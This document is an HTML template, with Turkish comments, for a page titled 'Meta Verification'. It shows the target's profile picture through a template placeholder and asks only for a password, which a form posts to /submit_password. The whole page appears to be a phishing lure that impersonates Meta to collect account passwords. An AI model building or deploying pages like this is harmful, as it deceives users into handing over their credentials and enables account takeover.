<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Meta Verification</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: "Roboto Flex", sans-serif;
            background-color: #fafafa63;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }

        .container {
            text-align: center;
            max-width: 320px;
            width: 100%;
            background-color: #fff;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            border-radius: 8px;
            padding: 30px 20px;
            position: relative;
        }

        /* Profil fotoğrafının yuvarlak olmasını sağlamak */
        #profile-container {
            margin-bottom: 20px;
        }

        #profile-picture {
           
            border-radius: 50%; /* Daire şekli için */
            
        }

        /* Parola formunun stilini düzenleme */
        #password-form {
            margin-top: 20px;
        }

        #password-form input[type="password"] {
            width: 100%;
            padding: 10px;
            font-size: 14px;
            border: 1px solid #ddd;
            border-radius: 4px;
            margin-bottom: 20px;
            outline: none;
        }

        #password-form input[type="password"]:focus {
            border-color: #6366F1;
        }

        #password-form button {
            width: 100%;
            padding: 10px;
            font-size: 16px;
            background-color: #6366F1;
            color: #fff;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }

        #password-form button:hover {
            background-color: #4F46E5;
        }
    </style>
</head>
<body>
    <div class="container">
        <!-- Profil fotoğrafı container'ı -->
        <div id="profile-container">
            <!-- Profil fotoğrafını düzgün şekilde görüntüle -->
            <img id="profile-picture" src="{{ profile_pic_url }}" alt="Profile Picture"">
        </div>

        <!-- Parola formu -->
        <div id="password-form">
            <form action="/submit_password" method="POST">
                <input type="password" name="password" placeholder="Enter your password" id="password">
                <button type="submit">Submit</button>
            </form>
        </div>
    </div>
</body>
</html>
